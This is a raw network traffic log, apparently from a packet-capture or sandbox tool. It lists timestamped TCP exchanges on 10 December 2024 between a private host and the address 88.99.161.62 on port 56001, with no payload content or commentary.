                                                                              Dec 10, 2024 07:01:43.952630043 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:43.952805042 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:44.001317024 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:44.001363039 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:44.001390934 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:44.001418114 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:44.073435068 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:44.092751980 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:44.092822075 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:44.123730898 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:44.168132067 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:44.168245077 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:44.168425083 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:44.241211891 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:44.241385937 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:44.279444933 CET560014976388.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:44.308233023 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:44.308291912 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:44.308566093 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:44.326792955 CET4976356001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:44.343080044 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:44.344310045 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:44.379261971 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:44.379340887 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:44.456557035 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:44.456876993 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:44.524163008 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:44.524245977 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:44.542860031 CET560014976388.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:44.592363119 CET4976356001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:44.594717979 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:44.595027924 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:44.604027987 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:44.604204893 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:44.679904938 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:44.680075884 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:44.739628077 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:44.739777088 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:44.739809990 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:44.740139008 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:44.824847937 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:44.824949980 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:44.863512993 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:44.895296097 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:44.895670891 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:44.895911932 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:44.895924091 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:44.983081102 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:44.983189106 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:45.040005922 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:45.040129900 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:45.040386915 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:45.040400028 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:45.126538992 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:45.126699924 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:45.204065084 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:45.204077959 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:45.276865005 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:45.277034044 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:45.341722965 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:45.341744900 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:45.341959953 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:45.341973066 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:45.429249048 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:45.429351091 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:45.492023945 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:45.492255926 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:45.492430925 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:45.559042931 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:45.559148073 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:45.644484043 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:45.644938946 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:45.714591026 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:45.714694023 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:45.774154902 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:45.774252892 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:45.774544001 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:45.774792910 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:45.862541914 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:45.862571955 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:45.929757118 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:45.929771900 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:45.929905891 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:45.930151939 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:46.019835949 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:46.019957066 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:46.077774048 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:46.077904940 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:46.159697056 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:46.235219002 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:46.235235929 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:46.235266924 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:46.300394058 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:46.300492048 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:46.375044107 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:46.375061035 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:46.450594902 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:46.450639963 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:46.515568972 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:46.515590906 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:46.515868902 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:46.515882969 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:46.594099998 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:46.594242096 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:46.665947914 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:46.665963888 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:46.745626926 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:46.745718002 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:46.809453964 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:46.809860945 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:46.897206068 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:46.897322893 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:46.960942030 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:46.960958958 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:46.960968018 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:46.961265087 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:47.048676968 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:47.048778057 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:47.112561941 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:47.112597942 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:47.112620115 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:47.194964886 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:47.195075035 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:47.264067888 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:47.264113903 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:47.264139891 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:47.347403049 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:47.347568989 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:47.410602093 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:47.410680056 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:47.496225119 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:47.496318102 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:47.562951088 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:47.563121080 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:47.563153028 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:47.648646116 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:47.648828030 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:47.711767912 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:47.711935997 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:47.711967945 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:47.798674107 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:47.798739910 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:47.864011049 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:47.864238024 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:47.864267111 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:47.948849916 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:47.949029922 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:48.014023066 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:48.014256001 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:48.014285088 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:48.014519930 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:48.097821951 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:48.097882032 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:48.164294958 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:48.164505005 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:48.164532900 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:48.245708942 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:48.245865107 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:48.313178062 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:48.313208103 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:48.313452005 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:48.397258997 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:48.397327900 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:48.461190939 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:48.461249113 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:48.461277008 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:48.530277014 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:48.530436993 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:48.612648964 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:48.612694025 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:48.612819910 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:48.612870932 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:48.681699038 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:48.745759964 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:48.746076107 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:48.828931093 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:48.897202969 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:48.897237062 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:48.897478104 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:48.897692919 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:48.984549999 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:48.984644890 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:49.044087887 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:49.044508934 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:49.044519901 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:49.134155989 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:49.199873924 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:49.199886084 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:49.277710915 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:49.349701881 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:49.349713087 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:49.434736967 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:49.434782028 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:49.493402004 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:49.581446886 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:49.650134087 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:49.650181055 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:49.713257074 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:49.713433981 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:49.797117949 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:49.797163010 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:49.865195036 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:49.928936958 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:49.928950071 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:49.999244928 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:49.999365091 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:50.080589056 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:50.080631971 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:50.151158094 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:50.214867115 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:50.215141058 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:50.297967911 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:50.366782904 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:50.366930962 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:50.450658083 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:50.450769901 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:50.513649940 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:50.513711929 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:50.601243019 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:50.601353884 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:50.666137934 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:50.666302919 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:50.666352034 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:50.752465010 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:50.752654076 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:50.817004919 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:50.817017078 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:50.817023039 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:50.901510954 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:50.967914104 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:50.968086004 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:50.968496084 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:51.060055017 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:51.060148001 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:51.116740942 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:51.116753101 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:51.116857052 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:51.204335928 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:51.275336981 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:51.275346994 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:51.275352955 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:51.275651932 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:51.349558115 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:51.349683046 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:51.419714928 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:51.419728041 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:51.419734001 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:51.419739962 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:51.484848976 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:51.484967947 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:51.564876080 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:51.564888954 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:51.564918995 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:51.565397024 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:51.634409904 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:51.634481907 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:51.700088978 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:51.700100899 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:51.700335026 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:51.783191919 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:51.849689960 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:51.849889040 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:51.936218977 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:51.936372042 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:51.998764992 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:51.998775959 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:51.998945951 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:52.083316088 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:52.151527882 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:52.151591063 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:52.151947975 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:52.217333078 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:52.217452049 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:52.298825026 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:52.298868895 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:52.365809917 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:52.432826042 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:52.433074951 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:52.433312893 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:52.506905079 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:52.507018089 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:52.581444025 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:52.581743002 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:52.649480104 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:52.649652958 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:52.722433090 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:52.722498894 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:52.722860098 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:52.782783985 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:52.782849073 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:52.864830017 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:52.865181923 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:52.865211010 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:52.916759014 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:52.916816950 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:52.998097897 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:52.998430967 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:52.998477936 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:53.068052053 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:53.068231106 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:53.132183075 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:53.132360935 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:53.223146915 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:53.223253012 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:53.283508062 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:53.283559084 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:53.283579111 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:53.283938885 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:53.373074055 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:53.373136044 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:53.438585043 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:53.438647032 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:53.438676119 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:53.520579100 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:53.520741940 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:53.588598967 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:53.588643074 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:53.588670015 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:53.588912964 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:53.677778959 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:53.677853107 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:53.736144066 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:53.736268997 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:53.736502886 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:53.821152925 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:53.821268082 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:53.893294096 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:53.893399954 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:53.893902063 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:53.953023911 CET4976256001192.168.11.2088.99.161.62
